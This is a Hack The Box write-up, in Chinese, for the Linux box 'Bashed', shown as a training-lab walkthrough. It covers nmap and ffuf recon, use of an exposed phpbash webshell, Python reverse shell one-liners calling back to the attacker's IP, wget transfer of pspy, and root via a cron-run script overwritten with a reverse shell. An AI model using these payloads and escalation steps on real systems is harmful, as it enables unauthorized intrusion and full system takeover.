# Hack The Box - Bashed Writeup Writeup for the box Bashed in Hack The Box. ## Box Info | OS | Difficulty | | ----- |:---------- | | Linux | Easy | ## Recon ### Nmap Basic scan: ```bash ┌──(parallels㉿kali)-[~/Documents/Hack The Box/Bashed] └─$ sudo nmap 10.10.10.68 -oA nmap/initial Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-12 13:39 CST Nmap scan report for 10.10.10.68 Host is up (0.40s latency). Not shown: 999 closed tcp ports (reset) PORT STATE SERVICE 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 2.95 seconds ``` 針對 port 80 進階掃描（version, default script）： ```bash ┌──(parallels㉿kali)-[~/Documents/Hack The Box/Bashed] └─$ sudo nmap -sC -sV 10.10.10.68 -p80 -oA nmap/bashed Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-12 13:40 CST Nmap scan report for 10.10.10.68 Host is up (0.093s latency). PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-title: Arrexel's Development Site |_http-server-header: Apache/2.4.18 (Ubuntu) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 9.91 seconds ``` ### Web Service - Port 80 網站：  網站上只有一篇介紹 phpbash 的文章，上網搜索後可以知道 [phpbash (Github Link)](https://github.com/Arrexel/phpbash?tab=readme-ov-file) 為 php webshell，其餘沒有什麼特別的內容，因此用目錄爆破來找額外的線索： ```bash ┌──(parallels㉿kali)-[~/Documents/Hack The Box/Bashed] └─$ ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt:FUZZ -u http://10.10.10.68/FUZZ -t 100 | tee directory /'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v2.1.0-dev ________________________________________________ :: Method : GET :: URL : http://10.10.10.68/FUZZ :: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 100 :: Matcher : Response status: 200-299,301,302,307,401,403,405,500 ________________________________________________ images [Status: 301, Size: 311, Words: 20, Lines: 10, Duration: 106ms] css [Status: 301, Size: 308, Words: 20, Lines: 10, Duration: 112ms] dev [Status: 301, Size: 308, Words: 20, Lines: 10, Duration: 120ms] php [Status: 301, Size: 308, Words: 20, Lines: 10, Duration: 100ms] fonts [Status: 301, Size: 310, Words: 20, Lines: 10, Duration: 116ms] uploads [Status: 301, Size: 312, Words: 20, Lines: 10, Duration: 5140ms] js [Status: 301, Size: 307, Words: 20, Lines: 10, Duration: 6160ms] server-status [Status: 403, Size: 299, Words: 22, Lines: 12, Duration: 94ms] [Status: 200, Size: 7743, Words: 2956, Lines: 162, Duration: 96ms] :: Progress: [30000/30000] :: Job [1/1] :: 733 req/sec :: Duration: [0:00:38] :: Errors: 2 :: ``` 查看 `/dev` 會發現有啟用目錄瀏覽，並且存在 phpbash webshell：  ## Shell as www-data 點擊 link 前往 `/dev/phpbash.php` 之後就可以直接開始利用 webshell 了：  在 phpbash webshell 中輸入 reverse shell 指令，並用 `nc` 接收就能連接到靶機了： ```bash python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.25",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")' ``` ```bash ┌──(parallels㉿kali)-[~/Documents/tools/Web Discovery/ReconSpider] └─$ nc -nlvp 9001 listening on [any] 9001 ... connect to [10.10.16.25] from (UNKNOWN) [10.10.10.68] 47470 www-data@bashed:/var/www/html/dev$ ^Z zsh: suspended nc -nlvp 9001 ┌──(parallels㉿kali)-[~/Documents/tools/Web Discovery/ReconSpider] └─$ stty raw -echo;fg [1] + continued nc -nlvp 9001 www-data@bashed:/var/www/html/dev$ ``` ### user.txt ```bash www-data@bashed:/home/arrexel$ cat user.txt b8c0cac3************************ ``` ## Shell as scriptmanager 執行 `sudo -l` 發現可以以 scriptmanager 身份執行任意指令： ```bash www-data@bashed:/home/arrexel$ sudo -l Matching Defaults entries for www-data on bashed: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User www-data may run the following commands on bashed: (scriptmanager : scriptmanager) NOPASSWD: ALL ``` 切換到 scriptmanager 身份： ```bash www-data@bashed:/var/www/html/dev$ sudo -u scriptmanager /bin/bash scriptmanager@bashed:/var/www/html/dev$ ``` ## Shell as root 下載 [pspy](https://github.com/DominicBreuker/pspy?tab=readme-ov-file) 並把它傳到靶機上，用 pspy 來檢查正在執行的 process： ```bash ┌──(parallels㉿kali)-[~/Documents/tools/Privilege Escalation] └─$ wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64 <...> pspy64 100%[===============================================================================>] 2.96M 5.26MB/s 於 0.6s 2024-10-13 00:54:47 (5.26 MB/s) - 已儲存 「pspy64」 [3104768/3104768] ┌──(parallels㉿kali)-[~/Documents/tools/Privilege Escalation] └─$ python3 -m http.server 8000 Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ... ``` ```bash scriptmanager@bashed:~$ wget http://10.10.16.25:8000/pspy64 <...> pspy64 100%[===============================================================================>] 2.96M 1.63MB/s in 1.8s 2024-10-12 09:44:41 (1.63 MB/s) - 'pspy64' saved [3104768/3104768] scriptmanager@bashed:~$ chmod +x pspy64 ``` ```bash scriptmanager@bashed:~$ ./pspy64 | tee pspy_result pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d ██▓███ ██████ ██▓███ ▓██ ██▓ ▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒ ▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░ ▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░ ▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░ ▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒ ░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░ ░░ ░ ░ ░ ░░ ▒ ▒ ░░ ░ ░ ░ ░ ░ Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching dire ctories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive) Draining file system events due to startup... done 2024/10/12 09:46:22 CMD: UID=1001 PID=14874 | tee pspy_result 2024/10/12 09:46:22 CMD: UID=1001 PID=14873 | ./pspy64 <...> 2024/10/12 09:47:01 CMD: UID=0 PID=14884 | python test.py 2024/10/12 09:47:01 CMD: UID=0 PID=14883 | /bin/sh -c cd /scripts; for f in *.py; do python "$f"; done 2024/10/12 09:47:01 CMD: UID=0 PID=14882 | /usr/sbin/CRON -f ``` 看起來像是有程式定期在執行 `/scripts` 下面所有的 .py 檔，而查看 `/scripts` 目錄下的檔案，test.&ZeroWidthSpace;txt 的擁有者為 root，並且看起來由 test.&ZeroWidthSpace;py 建立，因此執行者應該為 root： ```bash scriptmanager@bashed:/scripts$ ls -l total 8 -rw-r--r-- 1 scriptmanager scriptmanager 58 Dec 4 2017 test.py -rw-r--r-- 1 root root 12 Oct 12 09:52 test.txt scriptmanager@bashed:/scripts$ cat test.py f = open("test.txt", "w") f.write("testing 123!") f.close scriptmanager@bashed:/scripts$ cat test.txt testing 123! ``` 將 test.&ZeroWidthSpace;py 的內容改為 reverse shell payload，並且在本機用 nc 連接，過一陣子就可以拿到 root 權限了： ```bash scriptmanager@bashed:/scripts$ echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.25",9002));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")' > test.py ``` ```bash ┌──(parallels㉿kali)-[~/Documents/Hack The Box/Bashed] └─$ nc -lvnp 9002 listening on [any] 9002 ... connect to [10.10.16.25] from (UNKNOWN) [10.10.10.68] 39570 root@bashed:/scripts# ``` ### root.txt ```shell root@bashed:~# cat root.txt cat root.txt a5067c20************************ ```